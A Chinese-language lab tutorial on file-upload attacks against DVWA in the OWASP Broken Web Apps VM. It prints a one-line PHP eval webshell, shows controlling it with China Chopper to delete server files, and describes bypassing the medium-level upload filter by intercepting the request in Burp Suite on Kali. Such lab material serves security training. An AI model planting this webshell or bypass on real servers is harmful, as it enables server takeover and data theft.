上傳滲透----中國菜刀和kali的使用(安全攻防)

本文章僅供實驗參考

1.實驗環境

目標靶機:OWASP_Broken_Web_Apps_VM_1.2
下載地址
我們還需要中國菜刀kali這兩個工具,把所有的殺毒軟件關了,不然中國菜刀可能會被殺毒軟件和諧。
實驗原理

1、文件上傳(File Upload)是大部分Web應用都具備的功能,例如用戶上傳附件、修改頭像、分享圖片/視頻等
2、正常的文件一般是文檔、圖片、視頻等,Web應用收集之後放入後臺存儲,需要的時候再調用出來返回
3、如果惡意文件如PHP、ASP等執行文件繞過Web應用,並順利執行,則相當於黑客直接拿到了Webshell
4、一旦黑客拿到Webshell,則可以拿到Web應用的數據,刪除Web文件,本地提權,進一步拿下整個服務器甚至內網
5、SQL注入攻擊的對象是數據庫服務,文件上傳漏洞主要攻擊Web服務,實際滲透兩種相結合,達到對目標的深度控制

2.低安全模式

首先我們需要用虛擬機打開目標靶機,並查看ip地址
在這裏插入圖片描述

root@owaspbwa:~# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue state UNKNOWN 
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN qlen 1000
    link/ether 00:0c:29:b2:da:ea brd ff:ff:ff:ff:ff:ff
    inet 192.168.13.144/24 brd 192.168.13.255 scope global eth0
    inet6 fe80::20c:29ff:feb2:daea/64 scope link 
       valid_lft forever preferred_lft forever

找到ip後,我們打開網頁訪問192.168.13.144
在這裏插入圖片描述
在這裏插入圖片描述
在這裏插入圖片描述
在這裏插入圖片描述
在這裏插入圖片描述
上傳我們已經寫好的小馬文件(木馬)
文件裏面其實只有一行內容,所以叫做小馬
小馬: 一句話木馬也稱爲小馬,即整個shell代碼量只有一行,一般是系統執行函數
大馬: 代碼量和功能比小馬多,一般會進行二次編碼加密,防止被安全防火牆/入侵系統檢測到

<?php @eval($_POST['yjssjm']);?>
格式不要動,只需要改''裏面的東西就行了,yjssjm是你定義的密碼,與下面使用的中國菜刀密碼保持一致就行

然後我們去目標靶機上面查看並創建一個測試文件

root@owaspbwa:~# cd /owaspbwa/owaspbwa-svn/var/www/dvwa/hackable/uploads
root@owaspbwa:/owaspbwa/owaspbwa-svn/var/www/dvwa/hackable/uploads# ls
shell.php
root@owaspbwa:/owaspbwa/owaspbwa-svn/var/www/dvwa/hackable/uploads# echo 'aaaa' > a.txt   #創建一個測試文件
root@owaspbwa:/owaspbwa/owaspbwa-svn/var/www/dvwa/hackable/uploads# ls
a.txt  shell.php

在這裏插入圖片描述
在這裏插入圖片描述
在這裏插入圖片描述
在這裏插入圖片描述
設置好後我們雙擊點開
在這裏插入圖片描述
我們將a.txt刪除,然後去服務器上查看,發現服務器上的a.txt文件也被刪除了,這就是利用了上傳漏洞進行攻擊。
在這裏插入圖片描述

3.中安全模式

我們將安全改爲中等,這時候再上傳我們發現我們上傳失敗
**加粗樣式**
在這裏插入圖片描述
在這裏插入圖片描述
這個時候我們需要用到kali這個工具作爲代理,將我們訪問的消息攔截,然後進行類型的改變再轉發過去就可以了。
打開kali,默認用戶名是root,密碼是toor
在這裏插入圖片描述
在這裏插入圖片描述
然後我們一直點右下角I Accept ---- next ------ Start Burp 進入就行了
在這裏插入圖片描述
在這裏插入圖片描述
然後我們需要去網頁上設置,將所有的訪問都轉到192.168.13.145
在這裏插入圖片描述
在這裏插入圖片描述
然後我們再次上傳,這個時候kali上面會顯示我們上傳的信息
在這裏插入圖片描述
在這裏插入圖片描述
再看DVWA我們發現成功了
在這裏插入圖片描述
接下來就跟上面一樣了,我們可以在中國菜刀進入該服務器。
如果自己下載不好中國菜刀跟kali的小夥伴可以在評論區留下自己的郵箱,
在這裏勸大家自己在自己電腦上試試就好了,要是造成了經濟損失就不好了。

4.高安全模式

高安全模式我們去看源碼,會發現只能上傳圖片,這個時候的安全性以及很高了。
高安全模式下的做法

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章